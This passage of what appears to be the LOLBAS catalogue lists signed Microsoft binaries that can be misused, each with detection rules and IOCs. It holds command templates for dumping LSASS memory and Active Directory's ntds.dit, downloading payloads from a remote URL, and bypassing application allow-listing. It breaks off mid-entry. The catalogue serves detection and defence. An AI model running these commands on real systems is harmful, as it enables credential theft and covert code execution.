Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe Code_Sample: - Code: https://gist.github.com/nasbench/d9c15864f1e21bdd8b7cf55997b45f4b Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules Resources: - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda - Link: https://mrd0x.com/the-power-of-cdb-debugging-tool/ - Link: https://twitter.com/nas_bench/status/1534957360032120833 Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' - Person: mr.d0x Handle: '@mrd0x' - Person: Spooky Sec Handle: '@sec_spooky' - Person: Nasreddine Bencherchali Handle: '@nas_bench' ================================================ FILE: yml/OtherMSBinaries/Coregen.yml ================================================ --- Name: coregen.exe Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight. Author: Martin Sohn Christensen Created: 2020-10-09 Commands: - Command: coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name Description: Loads the target .DLL in arbitrary path specified with /L. Usecase: Execute DLL code Category: Execute Privileges: User MitreID: T1055 OperatingSystem: Windows Tags: - Execute: DLL - Command: coregen.exe dummy_assembly_name Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0). Usecase: Execute DLL code Category: Execute Privileges: User MitreID: T1055 OperatingSystem: Windows Tags: - Execute: DLL - Command: coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions. Usecase: Execute DLL code Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: DLL Full_Path: - Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe - Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml - IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" - IOC: coregen.exe loading .dll file not named coreclr.dll - IOC: coregen.exe command line containing -L or -l - IOC: coregen.exe command line containing unexpected/invald assembly name - IOC: coregen.exe application crash by invalid assembly name Resources: - Link: https://www.youtube.com/watch?v=75XImxOOInU - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html Acknowledgement: - Person: Nicky Tyrer - Person: Evan Pena - Person: Casey Erikson ================================================ FILE: yml/OtherMSBinaries/Createdump.yml ================================================ --- Name: Createdump.exe Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core) Author: mr.d0x, Daniel Santos Created: 2022-01-20 Commands: - Command: createdump.exe -n -f {PATH:.dmp} {PID} Description: Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process. Usecase: Dump process memory contents using PID. Category: Dump Privileges: SYSTEM MitreID: T1003 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\\createdump.exe - Path: C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App\\createdump.exe - Path: C:\Program Files\Microsoft Visual Studio\\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml - IOC: createdump.exe process with a command line containing the lsass.exe process id Resources: - Link: https://twitter.com/bopin2020/status/1366400799199272960 - Link: https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnetcore/practice-troubleshoot-linux/lab-1-3-capture-core-crash-dumps Acknowledgement: - Person: bopin Handle: '@bopin2020' ================================================ FILE: yml/OtherMSBinaries/Csi.yml ================================================ --- Name: csi.exe Description: Command line interface included with Visual Studio. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: csi.exe {PATH:.cs} Description: Use csi.exe to run unsigned C# code. Usecase: Local execution of unsigned C# code. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: CSharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules Resources: - Link: https://twitter.com/subTee/status/781208810723549188 - Link: https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ Acknowledgement: - Person: Casey Smith Handle: '@subtee' ================================================ FILE: yml/OtherMSBinaries/DefaultPack.yml ================================================ --- Name: DefaultPack.EXE Description: This binary can be downloaded along side multiple software downloads on the Microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider. Author: '@checkymander' Created: 2020-10-01 Commands: - Command: DefaultPack.EXE /C:"{CMD}" Description: Use DefaultPack.EXE to execute arbitrary binaries, with added argument support. Usecase: Can be used to execute stagers, binaries, and other malicious commands. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml - IOC: DefaultPack.EXE spawned an unknown process Resources: - Link: https://twitter.com/checkymander/status/1311509470275604480. Acknowledgement: - Person: checkymander Handle: '@checkymander' ================================================ FILE: yml/OtherMSBinaries/Devinit.yml ================================================ --- Name: Devinit.exe Description: Visual Studio 2019 tool Author: mr.d0x Created: 2022-01-20 Commands: - Command: devinit.exe run -t msi-install -i {REMOTEURL:.msi} Description: Downloads an MSI file to C:\Windows\Installer and then installs it. Usecase: Executes code from a (remote) MSI file. Category: Execute Privileges: User MitreID: T1218.007 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: MSI - Execute: Remote Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\Tools\devinit\devinit.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\Tools\devinit\devinit.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml Resources: - Link: https://twitter.com/mrd0x/status/1460815932402679809 Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ================================================ FILE: yml/OtherMSBinaries/Devtoolslauncher.yml ================================================ --- Name: Devtoolslauncher.exe Description: Binary will execute specified binary. Part of VS/VScode installation. Author: felamos Created: 2019-10-04 Commands: - Command: devtoolslauncher.exe LaunchForDeploy {PATH_ABSOLUTE:.exe} "{CMD:args}" test Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments and it will call `developertoolssvc.exe`. `developertoolssvc` is actually executing the binary. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: CMD - Command: devtoolslauncher.exe LaunchForDebug {PATH_ABSOLUTE:.exe} "{CMD:args}" test Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: CMD Full_Path: - Path: 'c:\windows\system32\devtoolslauncher.exe' Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml - IOC: DeveloperToolsSvc.exe spawned an unknown process Resources: - Link: https://twitter.com/_felamos/status/1179811992841797632 - Link: https://www.virustotal.com/gui/file/84877a507af8b70c145777a87eaf28a8327c50a1563fe650f34572bef8a42ff6/details Acknowledgement: - Person: felamos Handle: '@_felamos' ================================================ FILE: yml/OtherMSBinaries/Dnx.yml ================================================ --- Name: dnx.exe Description: .NET Execution environment file included with .NET. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: dnx.exe {PATH_ABSOLUTE:folder} Description: Execute C# code located in the specified folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies) Usecase: Local execution of C# project stored in consoleapp folder. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: CSharp Full_Path: - Path: no default Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules Resources: - Link: https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ================================================ FILE: yml/OtherMSBinaries/Dotnet.yml ================================================ --- Name: Dotnet.exe Description: dotnet.exe comes with .NET Framework Author: felamos Created: 2019-11-12 Commands: - Command: dotnet.exe {PATH:.dll} Description: dotnet.exe will execute any DLL even if applocker is enabled. Usecase: Execute code bypassing AWL Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed Tags: - Execute: DLL (.NET) - Command: dotnet.exe {PATH:.dll} Description: dotnet.exe will execute any DLL. Usecase: Execute DLL Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed Tags: - Execute: DLL (.NET) - Command: dotnet.exe fsi Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands Usecase: Execute arbitrary F# code Category: Execute Privileges: User MitreID: T1059 OperatingSystem: Windows 10 and up with .NET SDK installed Tags: - Execute: FSharp - Command: dotnet.exe msbuild {PATH:.csproj} Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code Usecase: Execute code bypassing AWL Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 10 and up with .NET Core installed Tags: - Execute: CSharp Full_Path: - Path: 'C:\Program Files\dotnet\dotnet.exe' Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: dotnet.exe spawned an unknown process Resources: - Link: https://twitter.com/_felamos/status/1204705548668555264 - Link: https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc - Link: https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/ - Link: https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/ Acknowledgement: - Person: felamos Handle: '@_felamos' - Person: Jimmy Handle: '@bohops' - Person: yamalon Handle: '@mavinject' ================================================ FILE: yml/OtherMSBinaries/Dsdbutil.yml ================================================ --- Name: dsdbutil.exe Description: Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. Can be used as a command line utility to export Active Directory. Aliases: - Alias: dsDbUtil.exe # PE Original filename Author: Ekitji Created: 2023-05-31 Commands: - Command: dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit" Description: dsdbutil supports VSS snapshot creation Usecase: Snapshoting of Active Directory NTDS.dit database Category: Dump Privileges: Administrator MitreID: T1003.003 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019 - Command: dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit" Description: Mounting the snapshot with its GUID Usecase: Mounting the snapshot to access the ntds.dit with `copy c:\\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak` Category: Dump Privileges: Administrator MitreID: T1003.003 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019 - Command: dsdbutil.exe "activate instance ntds" "snapshot" "delete {GUID}" "quit" "quit" Description: Deletes the mount of the snapshot Usecase: Deletes the snapshot Category: Dump Privileges: Administrator MitreID: T1003.003 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019 - Command: dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit" Description: Mounting with snapshot identifier Usecase: Mounting the snapshot identifier 1 and accessing it with `copy c:\\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak` Category: Dump Privileges: Administrator MitreID: T1003.003 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019 - Command: dsdbutil.exe "activate instance ntds" "snapshot" "list all" "delete 1" "quit" "quit" Description: Deletes the mount of the snapshot Usecase: deletes the snapshot Category: Dump Privileges: Administrator MitreID: T1003.003 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019 Full_Path: - Path: C:\Windows\System32\dsdbutil.exe - Path: C:\Windows\SysWOW64\dsdbutil.exe Detection: - IOC: Event ID 4688 - IOC: dsdbutil.exe process creation - IOC: Event ID 4663 - IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit - IOC: Event ID 4656 - IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit Resources: - Link: https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358 - Link: https://www.netwrix.com/ntds_dit_security_active_directory.html Acknowledgement: - Person: bohop Handle: '@bohops' - Person: Ekitji Handle: '@eki_erk' ================================================ FILE: yml/OtherMSBinaries/Dtutil.yml ================================================ --- Name: dtutil.exe Description: Microsoft command line utility used to manage SQL Server Integration Services packages. Author: Avihay Eldad Created: 2024-06-17 Commands: - Command: dtutil.exe /FILE {PATH_ABSOLUTE:.source.ext} /COPY FILE;{PATH_ABSOLUTE:.dest.ext} Description: Copy file from source to destination Usecase: Use to copies the source file to the destination file Category: Copy Privileges: Administrator MitreID: T1105 OperatingSystem: Windows Full_Path: - Path: C:\Program Files\Microsoft SQL Server\\DTS\Binn\dtutil.exe - Path: C:\Program Files (x86)\Microsoft SQL Server\\DTS\Binn\dtutil.exe Resources: - Link: https://learn.microsoft.com/en-us/sql/integration-services/dtutil-utility?view=sql-server-ver16 Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Dump64.yml ================================================ --- Name: Dump64.exe Description: Memory dump tool that comes with Microsoft Visual Studio Author: mr.d0x Created: 2021-11-16 Commands: - Command: dump64.exe {PID} out.dmp Description: Creates a memory dump of the LSASS process. Usecase: Create memory dump and parse it offline to retrieve credentials. Category: Dump Privileges: Administrator MitreID: T1003.001 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\dump64.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml - IOC: As a Windows SDK binary, execution on a system may be suspicious Resources: - Link: https://twitter.com/mrd0x/status/1460597833917251595 Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ================================================ FILE: yml/OtherMSBinaries/DumpMinitool.yml ================================================ --- Name: DumpMinitool.exe Description: Dump tool part Visual Studio 2022 Author: mr.d0x Created: 2022-01-20 Commands: - Command: DumpMinitool.exe --file {PATH_ABSOLUTE} --processId 1132 --dumpType Full Description: Creates a memory dump of the lsass process Usecase: Create memory dump and parse it offline Category: Dump Privileges: Administrator MitreID: T1003.001 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml Resources: - Link: https://twitter.com/mrd0x/status/1511415432888131586 Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ================================================ FILE: yml/OtherMSBinaries/Dxcap.yml ================================================ --- Name: Dxcap.exe Description: DirectX diagnostics/debugger included with Visual Studio. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Dxcap.exe -c {PATH_ABSOLUTE:.exe} Description: 'Launch specified executable as a subprocess of dxcap.exe. Note that you should have write permissions in the current working directory for the command to succeed; alternatively, add ''-file c:\path\to\writable\location.ext'' as first argument.' Usecase: Local execution of a process as a subprocess of dxcap.exe Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE - Command: dxcap.exe -usage Description: Once executed, `dxcap.exe` will execute `xperf.exe` in the same folder. Thus, if `dxcap.exe` is copied to a folder and an arbitrary executable is renamed to `xperf.exe`, `dxcap.exe` will spawn it. Usecase: Execute an arbitrary executable via trusted system executable. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Requires: Rename Full_Path: - Path: C:\Windows\System32\dxcap.exe - Path: C:\Windows\SysWOW64\dxcap.exe Code_Sample: - Code: https://gist.github.com/ghosts621/1d0e0f43f7288c826035d5d011b6ca51 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml - IOC: dxcap.exe executing from outside of System32/SysWOW64 - IOC: dxcap.exe spawning Xperf.exe - IOC: Xperf.exe executing from unusual directories (if not running from ADK path) Resources: - Link: https://twitter.com/harr0ey/status/992008180904419328 Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' - Person: Vikas Singh Handle: '@vikas891' - Person: Naor Evgi Handle: '@ghosts621' ================================================ FILE: yml/OtherMSBinaries/ECMangen.yml ================================================ --- Name: ECMangen.exe Description: Command-line tool for managing certificates in Microsoft Exchange Server. Author: Avihay Eldad Created: 2024-04-30 Commands: - Command: ECMangen.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Tags: - Download: INetCache Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\\Bin\ECMangen.exe - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\\Bin\x64\ECMangen.exe - Path: C:\Program Files\Microsoft\Exchange Server\\Bin\ECMangen.exe - Path: C:\Program Files\Microsoft\Exchange Server\Bin\ECMangen.exe - Path: C:\Program Files\Microsoft\Exchange Server\ClientAccess\Bin\ECMangen.exe - Path: C:\ExchangeServer\Bin\ECMangen.exe Detection: - IOC: URL on a ECMangen command line - IOC: ECMangen making unexpected network connections or DNS requests Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Excel.yml ================================================ --- Name: Excel.exe Description: Microsoft Office binary Author: 'Reegun J (OCBC Bank)' Created: 2019-07-19 Commands: - Command: Excel.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Tags: - Download: INetCache Full_Path: - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe - Path: C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe - Path: C:\Program Files\Microsoft Office\Office16\Excel.exe - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe - Path: C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe - Path: C:\Program Files\Microsoft Office\Office15\Excel.exe - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe - Path: C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe - Path: C:\Program Files\Microsoft Office\Office14\Excel.exe - Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml - IOC: Suspicious Office application Internet/network traffic Resources: - Link: https://twitter.com/reegun21/status/1150032506504151040 - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 Acknowledgement: - Person: 'Reegun J (OCBC Bank)' Handle: '@reegun21' ================================================ FILE: yml/OtherMSBinaries/Fsi.yml ================================================ --- Name: Fsi.exe Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - Command: fsi.exe {PATH:.fsscript} Description: Execute F# code via script file Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - Execute: FSharp - Command: fsi.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - Execute: FSharp Full_Path: - Path: C:\Program Files\dotnet\sdk\\FSharp\fsi.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe Code_Sample: - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 Detection: - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Fsi.exe execution may be suspicious on non-developer machines - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml Resources: - Link: https://twitter.com/NickTyrer/status/904273264385589248 - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ Acknowledgement: - Person: Nick Tyrer Handle: '@NickTyrer' - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OtherMSBinaries/FsiAnyCpu.yml ================================================ --- Name: FsiAnyCpu.exe Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - Command: fsianycpu.exe {PATH:.fsscript} Description: Execute F# code via script file Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - Execute: FSharp - Command: fsianycpu.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - Execute: FSharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe Code_Sample: - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 Detection: - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml Resources: - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ Acknowledgement: - Person: Nick Tyrer Handle: '@NickTyrer' - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OtherMSBinaries/IntelliTrace.yml ================================================ --- Name: IntelliTrace.exe Description: Visual Studio command-line tool for collecting and managing diagnostic trace files. Author: Avihay Eldad Created: 2025-09-21 Commands: - Command: IntelliTrace.exe launch /cp:"collectionplan.xml" /f:"c:\users\public\log" "C:\Windows\System32\calc.exe" Description: Launches an executable via Visual Studio command line utility. Usecase: Executes an executable under a trusted microsoft signed binary. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\IntelliTrace\IntelliTrace.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\IntelliTrace\IntelliTrace.exe Resources: - Link: https://learn.microsoft.com/en-us/visualstudio/debugger/intellitrace Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Logger.yml ================================================ --- Name: Logger.exe Description: A logging configuration tool from the Windows Kits used to start and manage process logging. Author: Avihay Eldad Created: 2025-07-13 Commands: - Command: logger.exe RUN "{CMD}" Description: Executes the command specified after the `RUN` parameter as a child of `logger.exe`. Usecase: Executes an abitrary command via a signed binary to evade detection. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows Tags: - Execute: CMD - Command: logger.exe RUNW "{CMD}" Description: Executes the command specified after the `RUNW` parameter as a child of `logger.exe`. Usecase: Executes an abitrary command via a signed binary to evade detection. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows Tags: - Execute: CMD - Command: logger.exe "{CMD}" Description: Executes the command specified as a child of `logger.exe`. Usecase: Executes an abitrary command via a signed binary to evade detection. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows Tags: - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\logger.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\logger.exe - Path: C:\Program Files\Windows Kits\10\Debuggers\x86\logger.exe - Path: C:\Program Files\Windows Kits\10\Debuggers\x64\logger.exe Resources: - Link: https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/logger Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Mftrace.yml ================================================ --- Name: Mftrace.exe Description: Trace log generation tool for Media Foundation Tools. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Mftrace.exe {PATH:.exe} Description: Launch specified executable as a subprocess of Mftrace.exe. Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE Full_Path: - Path: C:\Program 